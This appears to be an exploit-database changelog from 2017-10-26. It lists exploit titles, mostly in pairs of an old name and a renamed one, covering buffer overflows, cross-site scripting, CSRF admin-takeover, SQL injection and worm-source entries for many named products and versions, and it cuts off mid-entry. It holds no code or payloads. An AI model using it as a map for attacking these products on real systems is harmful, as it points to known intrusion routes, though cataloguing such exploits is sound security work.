DB: 2017-10-26
11 new exploits Ultr@VNC 1.0.1 - client Log::ReallyPrint Buffer Overflow (PoC) Ultr@VNC 1.0.1 - 'client Log::ReallyPrint' Buffer Overflow (PoC) AT-TFTP 1.9 - 'Long Filename' Remote Buffer Overflow (PoC) AT-TFTP 1.9 - 'Filename' Remote Buffer Overflow (PoC) VUPlayer 2.49 - '.asx' (HREF) Local Buffer Overflow (PoC) VUPlayer 2.49 - '.asx' HREF Local Buffer Overflow (PoC) ByteCatcher FTP Client 1.0.4 - Long Server Banner Buffer Overflow ByteCatcher FTP Client 1.0.4 - 'Server Banner' Buffer Overflow Avant Browser 8.0.2 - Long HTTP Request Buffer Overflow Avant Browser 8.0.2 - 'HTTP Request' Buffer Overflow thttpd 2.2x - defang Remote Buffer Overflow (PoC) thttpd 2.2x - 'defang' Remote Buffer Overflow (PoC) Rigs of Rods 0.33d - Long Vehicle Name Buffer Overflow Rigs of Rods 0.33d - 'Vehicle Name' Buffer Overflow Wireshark infer_pkt_encap - Heap Based Out-of-Bounds Read Wireshark AirPDcapDecryptWPABroadcastKey - Heap Based Out-of-Bounds Read Wireshark - 'infer_pkt_encap' Heap Based Out-of-Bounds Read Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Based Out-of-Bounds Read (1) Wireshark - AirPDcapDecryptWPABroadcastKey Heap Based Out-of-Bounds Read Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Based Out-of-Bounds Read (2) Wireshark 1.12.0 < 1.12.12 / 2.0.0 < 2.0.4- PacketBB Dissector Denial of Service Wireshark 1.12.0 < 1.12.12 / 2.0.0 < 2.0.4 - PacketBB Dissector Denial of Service WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (1) glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - Exploits glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - Exploit WinRAR 3.30 - Long Filename Buffer Overflow (1) WinRAR 3.30 - Long Filename Buffer Overflow (2) WinRAR 3.30 - 'Filename' Buffer Overflow (1) WinRAR 3.30 - 'Filename' Buffer Overflow (2) Pico Zip 4.01 - Long Filename Buffer Overflow Pico Zip 4.01 - 'Filename' Buffer Overflow PowerZip 7.06.38950 - Long Filename Handling Buffer Overflow PowerZip 7.06.38950 - 'Filename Handling' Buffer Overflow Oracle 9i/10g - Evil Views Change Passwords Exploit Oracle 9i/10g - Evil Views Change Passwords Oracle 10g/11g - SYS.LT.FINDRICSET SQL Injection (1) Oracle 10g/11g - SYS.LT.FINDRICSET SQL Injection (2) Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (1) Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (2) VUPlayer 2.49 - '.asx' (HREF) Local Buffer Overflow (2) VUPlayer 2.49 - '.asx' (HREF) Local Buffer Overflow (1) VUPlayer 2.49 - '.asx' HREF Local Buffer Overflow (2) VUPlayer 2.49 - '.asx' HREF Local Buffer Overflow (1) Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (Metasploit) (1) Wireshark 1.4.4 - 'packet-dect.c' Stack Buffer Overflow (Metasploit) (1) SGI IRIX 6.2 - eject Exploit (1) SGI IRIX 6.2 - eject Exploit (2) SGI IRIX 6.2 - 'eject' Exploit (1) SGI IRIX 6.2 - 'eject' Exploit (2) Slackware Linux 3.1/3.2 - color_xterm Buffer Overflow (2) Slackware Linux 3.1/3.2 - 'color_xterm' Buffer Overflow (2) RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 mailx - Exploit (2) RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 - 'mailx' Exploit (2) RedHat Linux 5.0/5.1/5.2 / Slackware Linux 3.5 - klogd Buffer Overflow (1) RedHat Linux 5.0/5.1/5.2 / Slackware Linux 3.5 - klogd Buffer Overflow (2) RedHat Linux 5.0/5.1/5.2 / Slackware Linux 3.5 - 'klogd' Buffer Overflow (1) RedHat Linux 5.0/5.1/5.2 / Slackware Linux 3.5 - 'klogd' Buffer Overflow (2) Solaris 2.5.1 kcms - Buffer Overflow (1) Solaris 2.5.1 kcms - Buffer Overflow (2) Solaris 2.5.1 - 'kcms' Buffer Overflow (1) Solaris 2.5.1 - 'kcms' Buffer Overflow (2) SGI IRIX 6.3 Systour and OutOfBox - Exploits SGI IRIX 6.3 Systour and OutOfBox - Exploit RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap tgetent() Buffer Overflow (1) RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap 'tgetent()' Buffer Overflow (1) GNU glibc 2.1/2.1.1 -6 - pt_chown Exploit GNU glibc 2.1/2.1.1 -6 - 'pt_chown' Exploit Solaris 7.0 ufsdump - Local Buffer Overflow (1) Solaris 7.0 ufsdump - Local Buffer Overflow (2) Solaris 7.0 - 'ufsdump' Local Buffer Overflow (1) Solaris 7.0 - 'ufsdump' Local Buffer Overflow (2) SCO Unixware 7.0 - xlock(1) (long 'Username') Buffer Overflow SCO Unixware 7.0 - 'xlock(1)' 'Username' Buffer Overflow RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x man - Buffer Overrun (1) RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x man - Buffer Overrun (2) RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x - 'man' Buffer Overrun (1) RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x - 'man' Buffer Overrun (2) Solaris 2.6/7.0 - lpset -r Buffer Overflow (1) Solaris 2.6/7.0 - lpset -r Buffer Overflow (2) Solaris 2.6/7.0 - lpset -r Buffer Overflow (3) Solaris 2.6/7.0 - 'lpset -r' Buffer Overflow (1) Solaris 2.6/7.0 - 'lpset -r' Buffer Overflow (2) Solaris 2.6/7.0 - 'lpset -r' Buffer Overflow (3) Solaris 2.6/7.0/8 netpr - Buffer Overflow (1) Solaris 2.6/7.0/8 netpr - Buffer Overflow (2) Solaris 2.6/7.0/8 - 'netpr' Buffer Overflow (1) Solaris 2.6/7.0/8 - 'netpr' Buffer Overflow (2) S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - fdmount Buffer Overflow (1) S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - fdmount Buffer Overflow (2) S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - fdmount Buffer Overflow (3) S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (1) S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (2) S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (3) Solaris 2.x/7.0/8 Catman - Race Condition (1) Solaris 2.x/7.0/8 Catman - Race Condition (2) Solaris 2.x/7.0/8 - 'Catman' Race Condition (1) Solaris 2.x/7.0/8 - 'Catman' Race Condition (2) DG/UX 4.20 lpsched - Long Error Message Buffer Overflow DG/UX 4.20 lpsched - 'Error Message' Buffer Overflow Solaris 7/8 kcms_configure - Command-Line Buffer Overflow (1) Solaris 7/8 kcms_configure - Command-Line Buffer Overflow (2) Solaris 7/8 - 'kcms_configure' Command-Line Buffer Overflow (1) Solaris 7/8 - 'kcms_configure' Command-Line Buffer Overflow (2) Solaris 2.5/2.6/7.0/8 - mailx -F Buffer Overflow (1) Solaris 2.5/2.6/7.0/8 - mailx -F Buffer Overflow (2) Solaris 2.5/2.6/7.0/8 - 'mailx -F' Buffer Overflow (1) Solaris 2.5/2.6/7.0/8 - 'mailx -F' Buffer Overflow (2) Sawmill 6.2.x - AdminPassword Insecure Default Permissions Sawmill 6.2.x - Admin Password Insecure Default Permissions XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (1) XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (2) XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (3) XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (4) XFree86 4.2 - 'XLOCALEDIR' Local Buffer Overflow (1) XFree86 4.2 - 'XLOCALEDIR' Local Buffer Overflow (2) XFree86 4.2 - 'XLOCALEDIR' Local Buffer Overflow (3) XFree86 4.2 - 'XLOCALEDIR' Local Buffer Overflow (4) BlazeVideo HDTV Player 6.6 Professional - Exploit (Direct Retn) BlazeVideo HDTV Player 6.6 Professional - Exploit (Direct RETN) Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation (1) Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation (2) Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - 'Long Filename' Remote Buffer Overflow Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - 'Filename' Remote Buffer Overflow Microsoft Internet Explorer - XML Parsing Buffer Overflow Microsoft Internet Explorer - XML Parsing Buffer Overflow (1) Microsoft Internet Explorer - XML Parsing Buffer Overflow Microsoft Internet Explorer - XML Parsing Buffer Overflow (2) Orbit Downloader 2.8.4 - Long Hostname Remote Buffer Overflow Orbit Downloader 2.8.4 - 'Hostname' Remote Buffer Overflow Huawei SmartAX MT880 - Multiple Cross-Site Request Forgery Vulnerabilities Huawei SmartAX MT880 - Cross-Site Request Forgery Multiple Vulnerabilities Solaris TelnetD - 'TTYPROMPT' Buffer Overflow (Metasploit) Solaris TelnetD - 'TTYPROMPT' Buffer Overflow (1) (Metasploit) HP LaserJet Printers - Multiple Persistent Cross-Site Scripting Vulnerabilities HP LaserJet Printers - Persistent Cross-Site Scripting Multiple Vulnerabilities XFTP 3.0 Build 0239 - Long Filename Buffer Overflow XFTP 3.0 Build 0239 - 'Filename' Buffer Overflow Solaris TelnetD - 'TTYPROMPT' Buffer Overflow (Metasploit) Solaris TelnetD - 'TTYPROMPT' Buffer Overflow (2) (Metasploit) D-Link TFTP 1.0 - Long Filename Buffer Overflow (Metasploit) ProSysInfo TFTP server TFTPDWIN 0.4.2 - Long Filename Buffer Overflow (Metasploit) 3Com TFTP Service (3CTftpSvc) - Long Mode Buffer Overflow (Metasploit) D-Link TFTP 1.0 - 'Filename' Buffer Overflow (Metasploit) ProSysInfo TFTP server TFTPDWIN 0.4.2 - 'Filename' Buffer Overflow (Metasploit) 3Com TFTP Service (3CTftpSvc) - 'Mode' Buffer Overflow (Metasploit) TFTPD32 < 2.21 - Long Filename Buffer Overflow (Metasploit) TFTPD32 < 2.21 - 'Filename' Buffer Overflow (Metasploit) Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (Metasploit) (2) Wireshark 1.4.4 - 'packet-dect.c' Stack Buffer Overflow (Metasploit) (2) WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - realpath Exploit (1) WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - realpath Exploit (2) WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Exploit (1) WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Exploit (2) Trend Micro Interscan VirusWall 3.2.3/3.3 - Long HELO Buffer Overflow (1) Trend Micro Interscan VirusWall 3.2.3/3.3 - 'HELO' Buffer Overflow (1) Trend Micro Interscan VirusWall 3.2.3/3.3 - Long HELO Buffer Overflow (2) Trend Micro Interscan VirusWall 3.2.3/3.3 - 'HELO' Buffer Overflow (2) Solaris 2.5/2.5.1/2.6/7.0 sadmind - Buffer Overflow (1) Solaris 2.5/2.5.1/2.6/7.0 sadmind - Buffer Overflow (2) Solaris 2.5/2.5.1/2.6/7.0 sadmind - Buffer Overflow (3) Solaris 2.5/2.5.1/2.6/7.0 sadmind - Buffer Overflow (4) Solaris 2.5/2.5.1/2.6/7.0 - 'sadmind' Buffer Overflow (1) Solaris 2.5/2.5.1/2.6/7.0 - 'sadmind' Buffer Overflow (2) Solaris 2.5/2.5.1/2.6/7.0 - 'sadmind' Buffer Overflow (3) Solaris 2.5/2.5.1/2.6/7.0 - 'sadmind' Buffer Overflow (4) Sun Java Web Server 1.1.3/2.0 Servlets - Exploits Sun Java Web Server 1.1.3/2.0 Servlets - Exploit Samba 1.9.19 - Long Password Buffer Overflow Samba 1.9.19 - 'Password' Buffer Overflow OReilly Software WebSite Professional 2.5.4 - Directory Disclosure OReilly Software WebSite Professional 2.5.4 - Path Disclosure PowerScripts PlusMail WebConsole 1.0 - Poor Authentication (1) PowerScripts PlusMail WebConsole 1.0 - Poor Authentication (2) PowerScripts PlusMail WebConsole 1.0 - Poor Authentication (3) PowerScripts PlusMail WebConsole 1.0 - Weak Authentication (1) PowerScripts PlusMail WebConsole 1.0 - Weak Authentication (2) PowerScripts PlusMail WebConsole 1.0 - Weak Authentication (3) AOLServer 3 - Long Authentication String Buffer Overflow (1) AOLServer 3 - Long Authentication String Buffer Overflow (2) AOLServer 3 - 'Authentication String' Buffer Overflow (1) AOLServer 3 - 'Authentication String' Buffer Overflow (2) John Roy Pi3Web 2.0 For Windows - Long Request Buffer Overflow John Roy Pi3Web 2.0 For Windows - Buffer Overflow Phusion WebServer 1.0 - Long URL Buffer Overflow Phusion WebServer 1.0 - 'URL' Buffer Overflow Essentia Web Server 2.1 - Long URL Buffer Overflow Essentia Web Server 2.1 - 'URL' Buffer Overflow Monkey HTTP Server 0.1/0.4/0.5 - Multiple Cross-Site Scripting Vulnerabilities Monkey HTTP Server 0.1/0.4/0.5 - Cross-Site Scripting Multiple Vulnerabilities TFTPD32 2.50 - Long Filename Buffer Overflow TFTPD32 2.50 - 'Filename' Buffer Overflow Opera 6.0/7.0 - Long Filename Download Buffer Overrun Opera 6.0/7.0 - 'Filename Download' Buffer Overrun PGP4Pine 1.75.6/1.76 - Long Message Line Buffer Overflow PGP4Pine 1.75.6/1.76 - 'Message Line' Buffer Overflow Passlog Daemon 0.1 - SL_Parse Remote Buffer Overflow (1) Passlog Daemon 0.1 - SL_Parse Remote Buffer Overflow (2) Passlog Daemon 0.1 - 'SL_Parse' Remote Buffer Overflow (1) Passlog Daemon 0.1 - 'SL_Parse' Remote Buffer Overflow (2) Tellurian TftpdNT 1.8/2.0 - Long Filename Buffer Overrun Tellurian TftpdNT 1.8/2.0 - 'Filename' Buffer Overrun Nokia Electronic Documentation 5.0 - Directory Disclosure Nokia Electronic Documentation 5.0 - Path Disclosure TCLHttpd 3.4.2 - Multiple Cross-Site Scripting Vulnerabilities TCLHttpd 3.4.2 - Cross-Site Scripting Multiple Vulnerabilities WebFS 1.x - Long Pathname Buffer Overrun WebFS 1.x - 'Pathname' Buffer Overrun Monit 1.4/2.x/3/4 - Long HTTP Request Buffer Overrun Monit 1.4/2.x/3/4 - 'HTTP Request' Buffer Overrun Novell Netware Enterprise Web Server 5.1/6.0 - Multiple Cross-Site Scripting Vulnerabilities Novell Netware Enterprise Web Server 5.1/6.0 - Cross-Site Scripting Multiple Vulnerabilities Oracle Reports Server 10g 9.0.2 - Multiple Cross-Site Scripting Vulnerabilities Oracle Reports Server 10g 9.0.2 - Cross-Site Scripting Multiple Vulnerabilities NETGEAR MA521 Wireless Driver 5.148.724 - Long Beacon Probe Buffer Overflow NETGEAR MA521 Wireless Driver 5.148.724 - 'Beacon Probe' Buffer Overflow Hilgraeve HyperAccess 8.4 - Multiple Remote Command Execution Vulnerabilities Hilgraeve HyperAccess 8.4 - Remote Command Execution Multiple Vulnerabilities TeamSpeak Server 2.0.23 (Multiple Scripts) - Multiple Cross-Site Scripting Vulnerabilities TeamSpeak Server 2.0.23 (Multiple Scripts) - Cross-Site Scripting Multiple Vulnerabilities RedHat Directory Server 7.1 - Multiple Cross-Site Scripting Vulnerabilities RedHat Directory Server 7.1 - Cross-Site Scripting Multiple Vulnerabilities Novell Groupwise 5.57e/6.5.7/7.0 Webaccess - Multiple Cross-Site Scripting Vulnerabilities Novell Groupwise 5.57e/6.5.7/7.0 Webaccess - Cross-Site Scripting Multiple Vulnerabilities RSA Authentication Agent for Web 5.3 - URI Redirection RSA Authentication Agent for Web 5.3 - Open Redirection Microsoft Outlook Web Access for Exchange Server 2003 - 'redir.asp' URI redirection Microsoft Outlook Web Access for Exchange Server 2003 - 'redir.asp' Open Redirection Novell QuickFinder Server - Multiple Cross-Site Scripting Vulnerabilities Novell QuickFinder Server - Cross-Site Scripting Multiple Vulnerabilities Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Multiple Cross-Site Scripting Vulnerabilities Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Cross-Site Scripting Multiple Vulnerabilities XAMPP 1.6.x - Multiple Cross-Site Scripting Vulnerabilities XAMPP 1.6.x - Cross-Site Scripting Multiple Vulnerabilities Zenoss 2.3.3 - Multiple Cross-Site Request Forgery Vulnerabilities Zenoss 2.3.3 - Cross-Site Request Forgery Multiple Vulnerabilities Huawei HG510 - Multiple Cross-Site Request Forgery Vulnerabilities Huawei HG510 - Cross-Site Request Forgery Multiple Vulnerabilities IBM Lotus Notes 6.5.6 - 'names.nsf' Open redirection IBM Lotus Notes 6.5.6 - 'names.nsf' Open Redirection HP System Management Homepage - 'RedirectUrl' URI Redirection HP System Management Homepage - 'RedirectUrl' Open Redirection Nagios XI - Multiple Cross-Site Request Forgery Vulnerabilities Nagios XI - Cross-Site Request Forgery Multiple Vulnerabilities DServe - Multiple Cross-Site Scripting Vulnerabilities DServe - Cross-Site Scripting Multiple Vulnerabilities Mozilla Firefox/Thunderbird/SeaMonkey - Multiple HTML Injection Vulnerabilities Mozilla Firefox/Thunderbird/SeaMonkey - HTML Injection Multiple Vulnerabilities Microsoft Visual Studio Report Viewer 2005 Control - Multiple Cross-Site Scripting Vulnerabilities SurgeFTP 23b6 - Multiple Cross-Site Scripting Vulnerabilities Microsoft Visual Studio Report Viewer 2005 Control - Cross-Site Scripting Multiple Vulnerabilities SurgeFTP 23b6 - Cross-Site Scripting Multiple Vulnerabilities Xavi 7968 ADSL Router - Multiple Cross-Site Request Forgery Vulnerabilities Xavi 7968 ADSL Router - Cross-Site Request Forgery Multiple Vulnerabilities Barracuda CudaTel Communication Server 2.0.029.1 - Multiple HTML Injection Vulnerabilities Barracuda CudaTel Communication Server 2.0.029.1 - HTML Injection Multiple Vulnerabilities Barracuda Email Security Service - Multiple HTML Injection Vulnerabilities Barracuda Email Security Service - HTML Injection Multiple Vulnerabilities Websense Content Gateway - Multiple Cross-Site Scripting Vulnerabilities Websense Content Gateway - Cross-Site Scripting Multiple Vulnerabilities FirePass 7.0 SSL VPN - 'refreshURL' URI Redirection FirePass 7.0 SSL VPN - 'refreshURL' Open Redirection Fortinet FortiWeb (Multiple Appliances) - Multiple Cross-Site Scripting Vulnerabilities Fortinet FortiWeb (Multiple Appliances) - Cross-Site Scripting Multiple Vulnerabilities Apache OFBiz 10.4.x - Multiple Cross-Site Scripting Vulnerabilities Apache OFBiz 10.4.x - Cross-Site Scripting Multiple Vulnerabilities Dell SonicWALL Scrutinizer - Multiple HTML Injection Vulnerabilities Dell SonicWALL Scrutinizer - HTML Injection Multiple Vulnerabilities Foscam IP (Multiple Cameras) - Multiple Cross-Site Request Forgery Vulnerabilities Foscam IP (Multiple Cameras) - Cross-Site Request Forgery Multiple Vulnerabilities Sony CH / DH Series IP Cameras - Multiple Cross-Site Request Forgery Vulnerabilities Sony CH / DH Series IP Cameras - Cross-Site Request Forgery Multiple Vulnerabilities Apache Struts 2.2.3 - Multiple Open redirection Vulnerabilities Apache Struts 2.2.3 - Multiple Open Redirections Barracuda CudaTel - Multiple Cross-Site Scripting Vulnerabilities Barracuda CudaTel - Cross-Site Scripting Multiple Vulnerabilities Netgear DGN1000 1.1.00.48 - 'Setup.cgi' Unauthenticated Remote Code Execution (Metasploit) ZeroBoard Worm - Source Code ZeroBoard - Worm Source Code Maxwebportal 1.36 - 'Password.asp' Change Password Exploit (3) (Perl) Maxwebportal 1.36 - 'Password.asp' Change Password Exploit (2) (PHP) Maxwebportal 1.36 - 'Password.asp' Change Password Exploit (1) (HTML) Maxwebportal 1.36 - 'Password.asp' Change Password (3) (Perl) Maxwebportal 1.36 - 'Password.asp' Change Password (2) (PHP) Maxwebportal 1.36 - 'Password.asp' Change Password (1) (HTML) Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities Jupiter CMS 1.1.5 - Cross-Site Scripting Multiple Vulnerabilities AuraCMS 2.x - '/user.php' Security Code Bypass / Add Administrator AuraCMS 2.x - '/user.php' Security Code Bypass / Arbitrary Add Administrator pPIM 1.0 - upload/change Password pPIM 1.0 - Upload/Change Password Observer 0.3.2.1 - Multiple Remote Command Execution Vulnerabilities Observer 0.3.2.1 - Remote Command Execution Multiple Vulnerabilities VideoScript 4.0.1.50 - Admin Change Password Exploit VideoScript 4.0.1.50 - Change Admin Password txtBB 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit txtBB 1.0 RC3 - HTML/JS Injection / Arbitrary Add Admin Privileges eLitius 1.0 - '/manage-admin.php' Add Admin/Change Password Exploit eLitius 1.0 - '/manage-admin.php' Arbitrary Add Admin/Change Password Exploit ShaadiClone 2.0 - 'addAdminmembercode.php' Add Admin ShaadiClone 2.0 - 'addAdminmembercode.php' Arbitrary Add Admin ZeeCareers 2.0 - 'addAdminmembercode.php' Add Admin ZeeCareers 2.0 - 'addAdminmembercode.php' Arbitrary Add Admin ecshop 2.6.2 - Multiple Remote Command Execution Vulnerabilities ecshop 2.6.2 - Remote Command Execution Multiple Vulnerabilities Zen Cart 1.3.8 - SQL Execution Exploit Zen Cart 1.3.8 - SQL Execution ZenPhoto Gallery 1.2.5 - Admin Password Reset (CRSF) ZenPhoto Gallery 1.2.5 - Admin Password Reset (Cross-Site Request Forgery) Snitz Forums 2000 - Multiple Cross-Site Scripting Vulnerabilities Snitz Forums 2000 - Cross-Site Scripting Multiple Vulnerabilities Hyperic HQ 3.2 < 4.2-beta1 - Multiple Cross-Site Scripting Vulnerabilities Hyperic HQ 3.2 < 4.2-beta1 - Cross-Site Scripting Multiple Vulnerabilities McAfee Network Security Manager < 5.1.11.8.1 - Multiple Cross-Site Scripting Vulnerabilities McAfee Network Security Manager < 5.1.11.8.1 - Cross-Site Scripting Multiple Vulnerabilities IBM Rational RequisitePro 7.10 / ReqWebHelp - Multiple Cross-Site Scripting Vulnerabilities IBM Rational RequisitePro 7.10 / ReqWebHelp - Cross-Site Scripting Multiple Vulnerabilities Sun Solaris AnswerBook2 - Multiple Cross-Site Scripting Vulnerabilities Sun Solaris AnswerBook2 - Cross-Site Scripting Multiple Vulnerabilities Chipmunk Board Script 1.x - Multiple Cross-Site Request Forgery Vulnerabilities Chipmunk Board Script 1.x - Cross-Site Request Forgery Multiple Vulnerabilities Ez Cart 1.0 - Multiple Cross-Site Request Forgery Vulnerabilities Ez Cart 1.0 - Cross-Site Request Forgery Multiple Vulnerabilities Basic PHP Events Lister 2 - Add Admin Jobscript4Web 3.5 - Multiple Cross-Site Request Forgery Vulnerabilities Basic PHP Events Lister 2 - Arbitrary Add Admin Jobscript4Web 3.5 - Cross-Site Request Forgery Multiple Vulnerabilities Traidnt Gallery - Add Admin Traidnt Gallery - Arbitrary Add Admin X7CHAT 1.3.6b - Add Admin X7CHAT 1.3.6b - Arbitrary Add Admin Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities Drupal 6.15 - Persistent Cross-Site Scripting Multiple Vulnerabilities CiviCRM 3.1 < Beta 5 - Multiple Cross-Site Scripting Vulnerabilities CiviCRM 3.1 < Beta 5 - Cross-Site Scripting Multiple Vulnerabilities Croogo 1.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities Croogo 1.2.1 - Cross-Site Request Forgery Multiple Vulnerabilities cPanel - Multiple Cross-Site Request Forgery Vulnerabilities cPanel - Cross-Site Request Forgery Multiple Vulnerabilities ATutor 1.6.4 - Multiple Cross-Site Scripting Vulnerabilities ANE CMD CRSF - Add Admin ATutor 1.6.4 - Cross-Site Scripting Multiple Vulnerabilities ANE CMD CRSF - Arbitrary Add Admin Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities Apache OFBiz - Cross-Site Scripting Multiple Vulnerabilities eXtreme Message Board 1.9.11 - Multiple Cross-Site Request Forgery Vulnerabilities eXtreme Message Board 1.9.11 - Cross-Site Request Forgery Multiple Vulnerabilities Campsite CMS 3.4.0 - Multiple Cross-Site Request Forgery Vulnerabilities Campsite CMS 3.4.0 - Cross-Site Request Forgery Multiple Vulnerabilities Phreebooks 2.0 - Multiple Persistent Cross-Site Scripting Vulnerabilities Phreebooks 2.0 - Persistent Cross-Site Scripting Multiple Vulnerabilities Orbis CMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities Orbis CMS 1.0.2 - Cross-Site Request Forgery Multiple Vulnerabilities ZenPhoto CMS 1.3 - Multiple Cross-Site Request Forgery Vulnerabilities ZenPhoto CMS 1.3 - Cross-Site Request Forgery Multiple Vulnerabilities Joomla! Component JomSocial 1.6.288 - Multiple Cross-Site Scripting Vulnerabilities Joomla! Component JomSocial 1.6.288 - Cross-Site Scripting Multiple Vulnerabilities Allomani E-Store 1.0 - Cross-Site Request Forgery (Add Admin) Allomani E-Store 1.0 - Cross-Site Request Forgery (Add Admin) (1) Frog CMS 0.9.5 - Multiple Cross-Site Request Forgery Vulnerabilities TomatoCart 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities TomatoCMS 2.0.5 - Multiple Cross-Site Request Forgery Vulnerabilities Frog CMS 0.9.5 - Cross-Site Request Forgery Multiple Vulnerabilities TomatoCart 1.0.1 - Cross-Site Request Forgery Multiple Vulnerabilities TomatoCMS 2.0.5 - Cross-Site Request Forgery Multiple Vulnerabilities TheHostingTool 1.2.2 - Multiple Cross-Site Request Forgery Vulnerabilities TheHostingTool 1.2.2 - Cross-Site Request Forgery Multiple Vulnerabilities Grafik CMS 1.1.2 - Multiple Cross-Site Request Forgery Vulnerabilities Grafik CMS 1.1.2 - Cross-Site Request Forgery Multiple Vulnerabilities Diferior CMS 8.03 - Multiple Cross-Site Request Forgery Vulnerabilities Diferior CMS 8.03 - Cross-Site Request Forgery Multiple Vulnerabilities MyIT CRM - Multiple Cross-Site Scripting Vulnerabilities MyIT CRM - Cross-Site Scripting Multiple Vulnerabilities Saurus CMS Admin Panel - Multiple Cross-Site Request Forgery Vulnerabilities Saurus CMS Admin Panel - Cross-Site Request Forgery Multiple Vulnerabilities Hycus CMS 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities Hycus CMS 1.0.1 - Cross-Site Request Forgery Multiple Vulnerabilities sNews CMS - Multiple Cross-Site Scripting Vulnerabilities sNews CMS - Cross-Site Scripting Multiple Vulnerabilities BlogBird Platform - Multiple Cross-Site Scripting Vulnerabilities BlogBird Platform - Cross-Site Scripting Multiple Vulnerabilities Front Accounting 2.3RC2 - Multiple Persistent Cross-Site Scripting Vulnerabilities Front Accounting 2.3RC2 - Persistent Cross-Site Scripting Multiple Vulnerabilities Diferior 8.03 - Multiple Cross-Site Scripting Vulnerabilities Diferior 8.03 - Cross-Site Scripting Multiple Vulnerabilities MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities MySmartBB 1.7 - Cross-Site Scripting Multiple Vulnerabilities Radius Manager 3.8.0 - Multiple Cross-Site Scripting Vulnerabilities Radius Manager 3.8.0 - Cross-Site Scripting Multiple Vulnerabilities PiXie CMS 1.04 - Multiple Cross-Site Request Forgery Vulnerabilities PiXie CMS 1.04 - Cross-Site Request Forgery Multiple Vulnerabilities Openfire 3.6.4 - Multiple Cross-Site Request Forgery Vulnerabilities Openfire 3.6.4 - Cross-Site Request Forgery Multiple Vulnerabilities TaskFreak! 0.6.4 - Multiple Cross-Site Scripting Vulnerabilities TaskFreak! 0.6.4 - Cross-Site Scripting Multiple Vulnerabilities SmarterMail 8.0 - Multiple Cross-Site Scripting Vulnerabilities SmarterMail 8.0 - Cross-Site Scripting Multiple Vulnerabilities WikiWig 5.01 - Multiple Cross-Site Scripting Vulnerabilities WikiWig 5.01 - Cross-Site Scripting Multiple Vulnerabilities Allomani E-Store 1.0 - Cross-Site Request Forgery (Add Admin) Allomani E-Store 1.0 - Cross-Site Request Forgery (Add Admin) (2) DoceboLms 4.0.4 - Multiple Persistent Cross-Site Scripting Vulnerabilities DoceboLms 4.0.4 - Persistent Cross-Site Scripting Multiple Vulnerabilities docuFORM Mercury WebApp 6.16a/5.20 - Multiple Cross-Site Scripting Vulnerabilities SocialCMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities docuFORM Mercury WebApp 6.16a/5.20 - Cross-Site Scripting Multiple Vulnerabilities SocialCMS 1.0.2 - Cross-Site Request Forgery Multiple Vulnerabilities ManageEngine ServiceDesk Plus 8.0 Build 8013 - Multiple Cross-Site Scripting Vulnerabilities ManageEngine ServiceDesk Plus 8.0 Build 8013 - Cross-Site Scripting Multiple Vulnerabilities ManageEngine ServiceDesk Plus 8.0 - Multiple Persistent Cross-Site Scripting 